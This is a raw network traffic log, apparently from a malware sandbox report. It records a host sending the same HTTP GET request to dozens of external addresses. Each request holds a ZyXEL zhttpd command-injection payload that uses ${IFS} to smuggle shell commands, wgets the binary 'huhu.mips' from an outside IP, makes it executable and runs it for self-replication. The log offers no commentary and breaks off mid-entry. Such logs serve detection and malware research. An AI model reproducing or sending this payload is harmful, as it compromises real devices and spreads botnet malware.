                                      Jan 19, 2024 17:29:20.528997898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1299192.168.2.1455244109.229.198.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529025078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1300192.168.2.1456318168.245.75.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529062986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1301192.168.2.1444720157.147.22.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529109955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1302192.168.2.143953839.213.36.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529146910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1303192.168.2.1437942115.38.153.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529194117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1304192.168.2.1443446170.1.64.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529241085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1305192.168.2.1442960156.18.195.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529290915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1306192.168.2.143885697.230.17.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529339075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1307192.168.2.144073843.16.122.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529381037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1308192.168.2.145838288.151.158.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529402018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1309192.168.2.1439248173.100.146.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529470921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1310192.168.2.1435036172.38.101.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529500008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1311192.168.2.145104649.12.218.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529556990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1312192.168.2.143615260.38.227.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529601097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1313192.168.2.1439314126.236.196.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529649973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1314192.168.2.144237444.59.253.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529692888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1315192.168.2.145827440.83.25.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529726982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1316192.168.2.143304437.252.106.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529747963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1317192.168.2.1438098174.102.243.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529791117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1318192.168.2.1449832217.43.255.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529817104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1319192.168.2.1437238110.177.16.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529848099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1320192.168.2.1460292177.29.76.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529898882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1321192.168.2.1453556162.113.216.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529920101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1322192.168.2.1460196184.240.36.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529969931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1323192.168.2.144961487.152.197.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.529999971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1324192.168.2.1450180220.71.172.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530054092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1325192.168.2.144231688.102.234.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530082941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1326192.168.2.1436958216.93.216.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530155897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1327192.168.2.1445726202.91.47.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530173063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1328192.168.2.144051251.45.34.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530224085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1329192.168.2.1451432104.211.187.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530267000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1330192.168.2.1452194120.131.118.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530327082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1331192.168.2.144597049.24.210.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530352116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1332192.168.2.1445740120.254.212.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530374050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1333192.168.2.1443658138.115.195.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530424118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1334192.168.2.145448884.27.37.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530456066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1335192.168.2.1448592123.203.154.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530507088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1336192.168.2.143850425.214.7.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530555010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1337192.168.2.1444778184.84.231.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530601978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1338192.168.2.1443954147.79.109.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530630112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1339192.168.2.145724218.47.122.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530689001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1340192.168.2.1436652177.21.116.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530741930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1341192.168.2.144545254.186.135.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530783892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1342192.168.2.145590412.196.159.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530797005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1343192.168.2.1447498119.219.80.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530855894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1344192.168.2.145438050.57.151.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530877113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1345192.168.2.14569322.162.112.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.530927896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1346192.168.2.1454910110.245.0.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.531636953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1347192.168.2.145779637.89.83.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.533987999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1348192.168.2.143892485.131.107.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.534068108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1349192.168.2.145409636.149.111.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.538779974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1350192.168.2.14407924.196.156.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.538831949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1351192.168.2.1457422216.12.39.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.538870096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1352192.168.2.1453796161.117.59.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.538908958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1353192.168.2.143831273.242.181.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.538935900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1354192.168.2.1455318149.117.153.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.538990021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1355192.168.2.146009047.197.68.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539027929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1356192.168.2.1459866152.241.207.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539077044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1357192.168.2.145044039.102.68.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539122105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1358192.168.2.144247637.95.203.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539150000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1359192.168.2.1450040193.41.143.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539187908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1360192.168.2.145607650.85.253.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539238930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1361192.168.2.1442822101.202.243.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:20.539283991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1362192.168.2.145933042.198.255.88443
                                      TimestampBytes transferredDirectionData
